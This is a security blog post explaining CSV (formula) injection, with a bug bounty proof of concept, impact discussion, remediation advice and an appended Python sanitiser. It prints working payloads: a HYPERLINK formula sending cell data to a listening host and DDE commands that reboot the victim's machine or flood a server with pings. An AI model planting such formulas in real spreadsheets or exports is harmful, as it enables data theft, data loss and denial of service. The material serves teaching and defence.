CSV (Formula) Injection

Mohammad Mohsin
4 min read · Apr 20, 2022

Hello friends!

This is my 14th blog on web application security penetration testing. In this blog I will explain CSV Injection. In my last blog, I explained Cross-Origin Resource Sharing. If you haven't read it yet, please follow along and subscribe to my blogs on Medium.

So let's not waste any more time and jump into the topic.

What is CSV Injection?

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

When a spreadsheet program such as Microsoft Excel or LibreOffice is used to open a CSV, any cells starting with = will be interpreted by the software as a formula.

Where to test for CSV Injection?

1. File Upload Functionalities

2. File Download Functionalities

3. Export File/Data in CSV Format options, etc.

Below is the step-by-step POC for CSV Injection which I tested on a private program. To honour the confidentiality agreement, the original domain is hidden and masked as redacted.com.

1. I logged into redacted.com and navigated to the File Upload functionality, where I was allowed to upload PDF or XLS files.

2. Click on the Upload button and a new page will appear where you can create a new template. Notice that you can upload xls/xlsx files using the Upload button.

3. Once the file upload is successful, you can download it from the download history or simply click on the Edit template page as shown below:

4. Once the downloaded file is opened by the user, Excel will display some security warnings that prevent the file from opening. Say Update and Yes to all warnings and open the file.

5. Click on Yes.

6. It will open the file and execute the formula injected into it. Here I have demonstrated this with a simple calculator command. Notice that the calculator opens when the user opens the file.

Most Common Payloads

Impact:

Maliciously crafted formulas can be used for three key attacks:

1] Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524

2] Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website

3] Exfiltrating contents from the spreadsheet, or other open spreadsheets.

And just like that, the attacker has free rein to download a keylogger, install things, and generally execute code remotely, not merely on any other person's computer but on that of someone guaranteed to have access to all users' data; for example, a manager or a company administrator.

Note: we are only demonstrating with the calculator, but a real attacker can take advantage of this vulnerability to shut down or ping a server by executing OS commands, or exploit it at a higher level, for example by importing files from an attacker-controlled server. The following formula embeds a hyperlink labelled "More here" in the Excel file; when the user clicks the link, the information in the selected cells is sent to the attacker's domain.

=HYPERLINK("http://172.0.0.1:8000?leads="&A2&B2, "More here")

An attacker can inject the following command, which will restart the victim's machine immediately; if the victim has unsaved data, it will be lost.

=cmd|'/C shutdown /r'!'A1'

An attacker can also ping a server and flood it with ping requests to perform a DoS attack.

=cmd|'/C ping -t 172.0.0.1 -l 25152'!'A1'

Recommendation:

In an Excel workbook, any cell that starts with =, -, +, or @ is treated as a formula. So, for any cell that begins with one of the formula-triggering characters =, -, +, or @, you should directly prefix it with a tab, apostrophe, or space character. Note that if the cell is quoted, this character goes inside the quotes.

This attack is difficult to mitigate, and it is explicitly excluded from the scope of quite a few bug bounty programs. To remediate it, ensure that no cell begins with any of the following characters:

  • Equals to (=)
  • Plus (+)
  • Minus (-)
  • At (@)
  • Tab (0x09)
  • Carriage return (0x0D)
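The recommendation above as working code, added here as an example (not from the original post): a CSV exporter that applies the apostrophe prefix to every cell starting with one of the listed characters, plus an audit helper that scans an existing CSV for cells a spreadsheet would evaluate. The sample rows and the host `attacker.example` are constructed for the demonstration.

```python
import csv
import io

# Characters that make Excel / LibreOffice treat a cell as a formula
# (the set listed in the Recommendation section).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def sanitize_cell(value):
    """Neutralise one cell value before it is written to CSV.

    A leading apostrophe makes spreadsheet software treat the cell as
    literal text, so a formula is displayed rather than evaluated.
    Values that do not start with a trigger character are unchanged.
    Note: negative numbers such as "-5" are prefixed too, as the
    recommendation is written; exempt numeric cells if that matters.
    """
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows):
    """Serialise rows to CSV text, sanitising every cell on the way out.

    csv.writer adds the quotes itself, so the apostrophe lands inside
    any quoting, which is where the spreadsheet needs it to be.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(c) for c in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit helper: (row, column, value) for each cell that starts with
    a formula trigger, i.e. that a spreadsheet would evaluate."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                findings.append((r, c, cell))
    return findings


# Constructed sample export; the "name" of row 2 is attacker-supplied.
SAMPLE_ROWS = [
    ["id", "name", "email"],
    ["1", "Alice", "alice@example.com"],
    ["2", '=HYPERLINK("http://attacker.example/?x="&A2, "More here")', "bob@example.com"],
    ["3", "-5 degrees", "carol@example.com"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```

Running `find_formula_cells` over the sanitised output returns an empty list, while the same scan over an unsanitised export reports the injected cell.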


Please do like and follow for more reads!

Thanks Readers!


Mohammad Mohsin

Director - OLF Infotech Pvt. Ltd. Ethical Hacker, Vulnerability Assessment and Penetration Tester, Bug Hunter, Security Researcher, Optimistic, Philanthropist.